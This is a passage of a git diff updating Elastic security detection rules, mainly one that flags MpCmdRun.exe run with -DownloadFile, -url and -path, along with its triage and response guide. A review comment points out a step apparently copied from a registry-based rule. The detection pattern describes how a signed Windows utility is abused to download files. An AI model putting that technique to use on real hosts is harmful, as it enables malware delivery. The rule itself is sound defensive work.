Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", "references": [ "https://twitter.com/mohammadaskar2/status/1301263551638761477", @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_108.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_108.json index 1b4dbcacc6c..4a83ba54a12 100644 
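Review bot: The investigation guide on the new side still tells the analyst to search for logon events (4624) "to the target host after the registry modification", but this rule fires on a process start of MpCmdRun.exe with `-DownloadFile` and makes no registry check, so that step reads as copied from a registry-based rule. The bullet should tie the logon search to the event this rule actually detects, e.g. `- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the file download.` The same wording is carried into the `note` hunk of the `_108.json` file below and into the new `_109.json` file, so the correction applies to all three. If these JSON files are exported from the rule source rather than edited by hand, the fix belongs in that source so the next export does not reintroduce it.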
--- a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_108.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via MpCmdRun", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", "references": [ "https://twitter.com/mohammadaskar2/status/1301263551638761477", @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", 
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_109.json b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_109.json
new file mode 100644
index 00000000000..fc1b88d7da0
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/c6453e73-90eb-4fe7-a98c-cde7bbfc504a_109.json
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Windows Defender configuration utility (MpCmdRun.exe) being used to download a remote file.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via MpCmdRun", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows Defender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files, including malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network 
Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n",
+ "references": [
+ "https://twitter.com/mohammadaskar2/status/1301263551638761477",
+ "https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1105",
+ "name": "Ingress Tool Transfer",
+ "reference": "https://attack.mitre.org/techniques/T1105/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_102.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_102.json
index 5bfeed2cf26..b3e70d8a800 100644
--- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_102.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_103.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_103.json
index ff2decf1f3c..e2b77ac4a99 100644
--- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_103.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_104.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_104.json index 196631f2c1c..79df7d46db7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_105.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_105.json index b8a6fe14123..bf106a4503b 100644 --- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_105.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_206.json b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_206.json index f455d19a4d3..71bd1d18dac 100644 --- a/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_206.json +++ b/packages/security_detection_engine/kibana/security_rule/c749e367-a069-4a73-b1f2-43a3798153ad_206.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_102.json b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_102.json index 39a6e6029cf..4085e81768d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_103.json b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_103.json index 30fd487afea..de9d15b4c2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_104.json b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_104.json index 9ca0cf5e0d6..8a2a516c683 100644 --- a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_205.json b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_205.json index 1b5ce9bc1d6..5881c796206 100644 --- a/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_205.json +++ b/packages/security_detection_engine/kibana/security_rule/c74fd275-ab2c-4d49-8890-e2943fa65c09_205.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_103.json b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_103.json index 521c272f863..d0dd3c19098 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_103.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_104.json b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_104.json index 0dd62cb279b..9804ce3475d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_104.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_105.json b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_105.json index d876105778e..2c12b08e7e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_105.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_201.json b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_201.json index 8471af114eb..ece6c0fdbe8 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_201.json +++ b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_201.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_202.json b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_202.json index 7e9a296dbc2..d2bb64e13b4 100644 --- 